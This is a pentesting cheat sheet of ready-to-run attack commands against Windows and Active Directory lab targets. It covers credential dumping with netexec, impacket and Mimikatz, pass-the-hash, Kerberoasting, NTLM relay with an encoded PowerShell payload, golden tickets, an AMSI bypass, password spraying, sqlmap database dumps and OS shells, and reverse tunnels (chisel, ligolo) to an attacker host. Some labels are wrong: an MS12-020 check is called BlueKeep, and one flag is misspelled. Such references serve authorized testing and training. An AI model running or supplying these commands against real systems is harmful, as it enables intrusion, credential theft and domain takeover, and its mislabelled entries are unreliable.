Pentesting Tools Cheat Sheet
# IMPORTANT TOOL NAMING UPDATES (2024+):
# netexec (nxc) — maintained successor to crackmapexec (deprecated 2023). Same syntax, different binary.
# certipy-ad — maintained successor to certipy by ly4k (archived). Same syntax, different pip package.
# BloodHound CE — Docker-based Community Edition, replaces legacy BloodHound + Neo4j setup.
TEXT
#NMAP - SCAN RECIPES
# 1. Quick top-1000 TCP SYN scan (default)
nmap -sC -sV -oA scan 10.10.10.5
# 2. Full TCP port scan + service detection
nmap -p- --min-rate 1000 -sV -sC -oA full_tcp 10.10.10.5
# 3. UDP top ports scan
nmap -sU --top-ports 200 --min-rate 500 -oA udp 10.10.10.5
# 4. Stealth SYN with OS detection
nmap -sS -O -sV -sC -oA stealth_os 10.10.10.5
# 5. Script scan for vulnerabilities
nmap -sV --script vuln -p 80,443,445,8080 10.10.10.5
# 6. SMB enumeration scripts
nmap -p 445 --script=smb-enum-shares,smb-enum-users,smb-os-discovery 10.10.10.5
# Useful flags
# -Pn skip host discovery (treat all as up)
# -T4 faster timing
# -oA name output all formats (gnmap, nmap, xml)
# --open show only open ports
# -iL hosts.txt import list of targets
# --script-help=* list all scripts
BASH
# Nmap NSE vulnerability scripts
nmap --script smb-vuln-ms17-010 -p 445 <target> # EternalBlue check
nmap --script ssl-heartbleed -p 443 <target> # Heartbleed check
nmap --script ssl-poodle -p 443 <target> # POODLE check
nmap --script http-vuln* -p 80,443 <target> # All HTTP vuln scripts
nmap --script rdp-vuln-ms12-020 -p 3389 <target> # BlueKeep check
nmap --script redis-info -p 6379 <target> # Redis info
nmap --script ldap-rootdse -p 389 <target> # LDAP root DSE
nmap --script ms-sql-info -p 1433 <target> # MSSQL info
nmap --script dns-zone-transfer -p 53 <target> # DNS zone transfer
nmap --script-args smbusername=user,smbpassword=pass # Pass args to scripts
BASH
#NETEXEC (NXC) - KEY MODULES
# SMB
netexec smb 10.10.10.5 -u user -p pass # check creds
netexec smb 10.10.10.5 -u user -p pass --shares # list shares
netexec smb 10.10.10.5 -u user -p pass --users # enumerate users
netexec smb 10.10.10.0/24 -u user -p pass --local-auth # local auth
netexec smb targets.txt -u '' -p '' --shares # null session
netexec smb 10.10.10.5 -u user -H 'NTHASH' --shares # pass-the-hash
netexec smb 10.10.10.5 -u user -p pass -x 'whoami' # execute command
netexec smb 10.10.10.5 -u user -p pass -M lsassy # dump lsass
netexec smb 10.10.10.5 -u user -p pass -M spider_plus # spider shares
netexec smb 10.10.10.5 -u user -p pass --local-groups # local groups
netexec smb 10.10.10.5 -u user -p pass --rid-brute # RID brute
netexec smb 10.10.10.5 -u user -p pass --sam # dump SAM
netexec smb 10.10.10.5 -u user -p pass --lssa # dump LSA
# LDAP
netexec ldap 10.10.10.5 -u user -p pass # validate creds
netexec ldap 10.10.10.5 -u user -p pass --users # dump users
netexec ldap 10.10.10.5 -u user -p pass --groups # dump groups
netexec ldap 10.10.10.5 -u user -p pass -M adcs # AD CS enumerate
netexec ldap 10.10.10.5 -u user -p pass -M laps # LAPS check
netexec ldap 10.10.10.5 -u user -p pass --trusted-for-delegation
netexec ldap 10.10.10.5 -u user -p pass --kerberoasting kerberoast.txt
netexec ldap 10.10.10.5 -u user -p pass --asreproast asrep.txt
# WinRM
netexec winrm 10.10.10.5 -u user -p pass # test WinRM
netexec winrm 10.10.10.5 -u user -p pass -x 'whoami' # execute
netexec winrm 10.10.10.5 -u user -p pass --local-auth
# MSSQL
netexec mssql 10.10.10.5 -u sa -p password # test creds
netexec mssql 10.10.10.5 -u sa -p password -M mssql_priv # check privs
netexec mssql 10.10.10.5 -u sa -p password -x 'whoami' # xp_cmdshell
# Spraying
netexec smb 10.10.10.0/24 -u users.txt -p Summer2024! --continue-on-success
netexec smb 10.10.10.0/24 -u user -p passwords.txt --no-bruteforce
BASH
# Additional NetExec modules:
nxc smb <target> -u user -p pass --sam # Remote SAM dump
nxc smb <target> -u user -p pass --lsa # LSA secrets dump
nxc smb <target> -u user -p pass --ntds # NTDS dump
nxc smb <target> -u user -p pass --dpapi # DPAPI keys dump
nxc smb <target> -u user -p pass --disks # List disk drives
nxc smb <target> -u user -p pass --sessions # Active sessions
nxc smb <target> -u user -p pass --loggedon-users # Logged-on users
nxc smb <target> -u user -p pass --password-policy # Password policy
nxc smb <target> -u user -p pass --local-auth # Local auth (not domain)
nxc smb <target> -u user -p pass -M lsassy # Remote LSASS dump
# LDAP modules:
nxc ldap <target> -u user -p pass --gmsa # gMSA password read
nxc ldap <target> -u user -p pass -M laps # LAPS password extract
nxc ldap <target> -u user -p pass -M delegation # Find delegation types
BASH
#IMPACKET TOOLS
# Remote execution
impacket-psexec domain.local/user:pass@10.10.10.5
impacket-psexec domain/user:pass@10.10.10.5 -hashes :NTHASH
impacket-wmiexec domain/user:pass@10.10.10.5
impacket-wmiexec domain/user@10.10.10.5 -hashes :NTHASH
impacket-smbexec domain/user:pass@10.10.10.5
impacket-atexec domain/user:pass@10.10.10.5 "whoami"
# Credential dumping
impacket-secretsdump domain/user:pass@10.10.10.5
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL
impacket-secretsdump -just-dc-user administrator domain/user:pass@DC
impacket-secretsdump -hashes :NTHASH domain/user@DC
# Kerberos
impacket-GetNPUsers domain.local/ -usersfile users.txt -no-pass -dc-ip 10.10.10.5
impacket-GetNPUsers domain.local/user -no-pass -dc-ip 10.10.10.5 -request -outputfile hashes.asreproast
impacket-GetUserSPNs domain.local/user:pass -dc-ip 10.10.10.5 -request
impacket-GetUserSPNs domain.local/user -hashes :NTHASH -dc-ip 10.10.10.5 -request -outputfile kerberoast.txt
impacket-getTGT domain.local/user:pass -dc-ip 10.10.10.5
impacket-getTGT domain.local/user -hashes :NTHASH -dc-ip 10.10.10.5
export KRB5CCNAME=user.ccache && impacket-psexec -k -no-pass domain.local/user@TARGET
impacket-ticketer ... # forge silver/golden ticket (see notes)
impacket-ticketConverter ticket.kirbi ticket.ccache # convert ticket format
# Misc
impacket-ntlmrelayx -tf targets.txt -smb2support
impacket-ntlmrelayx -tf targets.txt -smb2support -c "powershell -enc BASE64"
impacket-smbserver share . -smb2support
impacket-rpcdump @10.10.10.5
impacket-samrdump domain/user:pass@10.10.10.5
impacket-lookupsid domain/user:pass@10.10.10.5
BASH
# Impacket ntlmrelayx — common attack modes
impacket-ntlmrelayx -tf targets.txt -smb2support -adcs # ADCS certificate enrollment relay
impacket-ntlmrelayx -tf targets.txt -smb2support -t ldap://dc01 --delegate-access # RBCD via LDAP relay
impacket-ntlmrelayx -tf targets.txt -smb2support --add-computer # Auto machine account via LDAP relay
impacket-ntlmrelayx -tf targets.txt -smb2support -i # Interactive SMB shell
impacket-ntlmrelayx -tf targets.txt -smb2support -t mssql://target # MSSQL shell
impacket-ntlmrelayx -tf targets.txt -smb2support -socks # SOCKS proxy mode (use with proxychains)
impacket-ntlmrelayx -tf targets.txt -smb2support -6 # IPv6 relay (with mitm6)
BASH
#BLOODHOUND COLLECTORS
# SharpHound (on target, PowerShell)
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -ZipFileName out.zip
Invoke-BloodHound -CollectionMethod DCOnly -ZipFileName dc.zip
Invoke-BloodHound -CollectionMethod LoggedOn,Session,Group
# SharpHound.exe (on target, C#)
SharpHound.exe -c All --zipfilename out.zip
SharpHound.exe -c Sessions,LoggedOn -d domain.local
# BloodHound-python (from attacker, via LDAP)
bloodhound-python -d domain.local -u user -p pass -c All -ns 10.10.10.5
bloodhound-python -d domain.local -u user -p pass -c DCOnly,Session -dc DC.domain.local
bloodhound-python -d domain.local -u user -p pass --dns-tcp --collectionmethod All
# Start neo4j + BloodHound GUI
sudo neo4j console
bloodhound
BASH
# BloodHound CE (Community Edition) — Docker deployment (2024+ standard)
curl -L https://github.com/SpecterOps/bloodhound-ce/raw/main/docker-compose.yml -o docker-compose.yml
docker compose up -d
# Access: http://localhost:8080 | Default creds: admin / admin (change on first login)
# SharpHound CE collector built into the web UI
# Legacy BloodHound uses: sudo neo4j console → bloodhound (http://localhost:7474)
BASH
#EVIL-WINRM
# Connect with password
evil-winrm -i 10.10.10.5 -u administrator -p 'Passw0rd!'
evil-winrm -i 10.10.10.5 -u user -p 'pass' -s /opt/scripts # scripts dir
# Pass-the-hash
evil-winrm -i 10.10.10.5 -u administrator -H 'NTHASH'
# SSL
evil-winrm -i 10.10.10.5 -u user -p pass -S
# File transfer
upload /local/path/nc.exe C:\Windows\Temp\nc.exe
download C:\Windows\Temp\sam.hive /local/path/sam.hive
# Bypass AMSI
evil-winrm -i 10.10.10.5 -u user -p pass -s /usr/share/evil-winrm/examples
# Built-in menu (in shell)
menu
Bypass-4MSI
Invoke-Binary /opt/mimikatz.exe
BASH
# Additional evil-winrm flags:
evil-winrm -i 10.10.10.10 -u user -p pass -s /opt/scripts # Load scripts path
evil-winrm -i 10.10.10.10 -u user -p pass -e /opt/exts # Load extensions path
evil-winrm -i 10.10.10.10 -u user -p pass -S # SSL connection
evil-winrm -i 10.10.10.10 -u user -p pass --timeout 30 # Longer timeout for slow targets
BASH
#HASHCAT HASH MODES TABLE
Mode Hash Type
0 MD5
100 SHA1
500 md5crypt (Unix)
1000 NTLM
1400 SHA-256
1700 SHA-512
1800 sha512crypt $6$ (Unix)
3000 LM
3200 bcrypt $2*$ (Unix)
5500 NetNTLMv1
5600 NetNTLMv2
7300 IPMI2 RAKP HMAC-SHA1
7500 Kerberos 5 AS-REQ Pre-Auth etype 23
13100 Kerberos 5 TGS-REP etype 23 (kerberoasting)
13400 Keepass 1/2
13600 WinZip
13711 VeraCrypt SHA256 XTS 512
16700 FileVault 2
16800 WPA-PMKID-PBKDF2
16801 WPA-PMKID-PMK
18200 Kerberos 5 AS-REP etype 23 (AS-REP roasting)
19600 Kerberos 5 TGS-REP etype 17
19700 Kerberos 5 TGS-REP etype 18
22000 WPA-PBKDF2-PMKID+EAPOL
22001 WPA-PMK-PMK
TEXT
#JOHN FORMATS (MATCHING HASHCAT)
# Common John hash formats
john --list=formats | grep -i ntlm
john --list=formats | grep -i kerberos
# Format names
john hash.txt --format=NT # NTLM
john hash.txt --format=LM # LM
john hash.txt --format=Raw-MD5 # MD5
john hash.txt --format=Raw-SHA1 # SHA1
john hash.txt --format=Raw-SHA256 # SHA-256
john hash.txt --format=krb5tgs # Kerberos TGS (kerberoasting)
john hash.txt --format=krb5asrep # AS-REP (asreproast)
john hash.txt --format=netntlmv2 # NetNTLMv2
john hash.txt --format=bcrypt # bcrypt
john hash.txt --format=sha512crypt # Unix $6$
# Cracking
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --rules=best64 --wordlist=rockyou.txt hash.txt
john --show hash.txt
BASH
#SQLMAP RECIPES
# GET request
sqlmap -u "http://target/page.php?id=1" --batch
sqlmap -u "http://target/page.php?id=1" --dbs
sqlmap -u "http://target/page.php?id=1" -D dbname --tables
sqlmap -u "http://target/page.php?id=1" -D dbname -T users --dump
sqlmap -u "http://target/page.php?id=1" -D dbname -T users -C username,password --dump
# POST request
sqlmap -u "http://target/login.php" --data="user=admin&pass=test" --dbs
# Request from file (Burp-saved request)
sqlmap -r request.txt --batch
sqlmap -r request.txt -p parameter --dbs
# OS shell (requires dba privileges)
sqlmap -u "http://target/page.php?id=1" --os-shell
# Fingerprint only
sqlmap -u "http://target/page.php?id=1" --fingerprint
sqlmap -u "http://target/page.php?id=1" --current-user --is-dba
# Useful flags
# --level=3 --risk=2 increase test depth
# --tamper=space2comment WAF bypass tamper scripts
# --threads=10 parallel threads
# --batch non-interactive
# --force-ssl
# --proxy=http://127.0.0.1:8080
BASH
#HYDRA EXAMPLES
# SSH
hydra -l root -P passwords.txt ssh://10.10.10.5
hydra -L users.txt -P rockyou.txt 10.10.10.5 ssh
# HTTP POST login
hydra -l admin -P passwords.txt 10.10.10.5 http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid"
hydra -L users.txt -p password 10.10.10.5 http-post-form "/login:user=^USER^&pass=^PASS^:F=Login failed"
# SMB
hydra -l administrator -P passwords.txt 10.10.10.5 smb
# RDP
hydra -l administrator -P passwords.txt 10.10.10.5 rdp
# FTP
hydra -L users.txt -P passwords.txt ftp://10.10.10.5
# MySQL
hydra -l root -P passwords.txt 10.10.10.5 mysql
# WinRM
hydra -l administrator -P passwords.txt 10.10.10.5 winrm
# Useful flags
# -t 4 reduce threads to avoid lockouts
# -f stop after first successful login
# -vV verbose (show attempts)
# -s 2222 custom port
# -o results.txt output file
BASH
#TUNNELING / PIVOTING
# Chisel (attacker server)
chisel server -p 8000 --reverse
# Chisel (target client)
.\chisel.exe client 10.10.14.5:8000 R:socks # SOCKS proxy
.\chisel.exe client 10.10.14.5:8000 R:1080:socks # specific SOCKS port
.\chisel.exe client 10.10.14.5:8000 R:8888:127.0.0.1:80 # single port forward
.\chisel.exe client 10.10.14.5:8000 R:3389:10.10.10.6:3389 # pivot to other host
# Ligolo-ng (attacker)
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 10.10.10.0/24 dev ligolo
ligolo-proxy -selfcert
# Ligolo-ng (target)
ligolo-agent -connect 10.10.14.5:11601 -ignore-cert
# SSH tunneling
ssh -L 8080:localhost:80 user@target # local port forward
ssh -R 8080:localhost:80 user@attacker # remote port forward
ssh -D 1080 user@target # dynamic SOCKS proxy
ssh -J user@pivot:22 user@target # jump host
# Proxychains
tail /etc/proxychains4.conf # make sure socks4 127.0.0.1 1080
proxychains nmap -sT -Pn -p 80,445 10.10.10.6
proxychains netexec smb 10.10.10.6 -u user -p pass
BASH
#CERTIPY COMMANDS
# AD CS enumeration
certipy find -dc-ip 10.10.10.5 -u user@domain.local -p pass -vulnerable
certipy find -dc-ip 10.10.10.5 -u user@domain.local -p pass -enabled
# Common ESC attacks
certipy req -u user@domain.local -p pass -ca 'CA-Name' -target DC.domain.local -template ESC1 -upn administrator
certipy req -u user@domain.local -p pass -ca 'CA-Name' -target DC.domain.local -template ESC1 -dns DC.domain.local
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.5
# ESC8 (Web Enrollment relay)
certipy relay -ca CA-NAME -template DomainController
# TGT via certificate
certipy req -u user@domain.local -p pass -target-ip 10.10.10.5 -ca CA-NAME -template User
certipy auth -pfx user.pfx -dc-ip 10.10.10.5
BASH
# certipy-ad ESC commands (certipy-ad is the 2024+ maintained fork of certipy)
certipy find -u user@domain.local -p pass -dc-ip 10.10.10.10 -enabled # Find enabled templates
# ESC1: Client authentication + enrollee supplies subject
certipy req -u user@domain.local -p pass -ca CA-NAME -template ESC1 -upn administrator@domain.local
# ESC2: Misconfigured Enrollee Supplies Subject (any EKU)
certipy req -u user@domain.local -p pass -ca CA-NAME -template ESC2 -dns target.domain.local
# ESC3: Certificate Enrollment Agent
certipy req -u user@domain.local -p pass -ca CA-NAME -template ESC3 -enrollee administrator@domain.local
# ESC4: Vulnerable Certificate Template Access Control
certipy template -u user@domain.local -p pass -template ESC4 -save
# ESC6: EditFAttributesCustomAttributes
certipy req -u user@domain.local -p pass -ca CA-NAME -template ESC6 -upn administrator@domain.local
# ESC7: Vulnerable CA Access Control
certipy ca -u user@domain.local -p pass -ca CA-NAME -add-officer user
# ESC8: NTLM Relay to ADCS
impacket-ntlmrelayx -t adcs://10.10.10.10 -smb2support
# ESC9: No Security Extension (combined with strong certificate mapping)
certipy req -u user@domain.local -p pass -ca CA-NAME -template ESC9
# ESC15: Application Policy (new in 2024)
certipy req -u user@domain.local -p pass -ca CA-NAME -template ESC15 -application-policies "1.3.6.1.5.5.7.3.2"
BASH
#MIMIKATZ KEY COMMANDS
# On target, run as admin
privilege::debug
token::elevate
# Dump credentials
sekurlsa::logonpasswords # dump all logon passwords
sekurlsa::wdigest # WDigest credentials
sekurlsa::kerberos # Kerberos tickets
sekurlsa::tickets /export # export tickets to .kirbi
lsadump::sam # dump SAM
lsadump::lsa /patch # dump LSA secrets
lsadump::secrets # dump cached domain creds
lsadump::dcsync /user:krbtgt # DCSync krbtgt hash
# Pass-the-hash
sekurlsa::pth /user:administrator /domain:domain.local /ntlm:NTHASH /run:cmd.exe
# Pass-the-ticket
kerberos::ptt ticket.kirbi
# Golden ticket
kerberos::golden /user:fakeadmin /domain:domain.local /sid:S-1-5-21-XXX /krbtgt:KRBTGT_NTHASH /id:500
# Misc
token::list
token::elevate /domainadmin
vault::list
misc::skeleton # skeleton key (domain admin, very noisy)
POWERSHELL
#RESPONDER — NTLM CAPTURE AND POISONING
# Responder — NTLM capture and poisoning
sudo responder -I tun0 -dwP # All protocols + WPAD proxy auth
sudo responder -I tun0 -wrf # WPAD + fingerprint
sudo responder -I tun0 -b # Basic auth only (NTLMv1)
# When using ntlmrelayx, disable Responder SMB/HTTP servers:
# Edit /etc/responder/Responder.conf: SMB=Off, HTTP=Off
BASH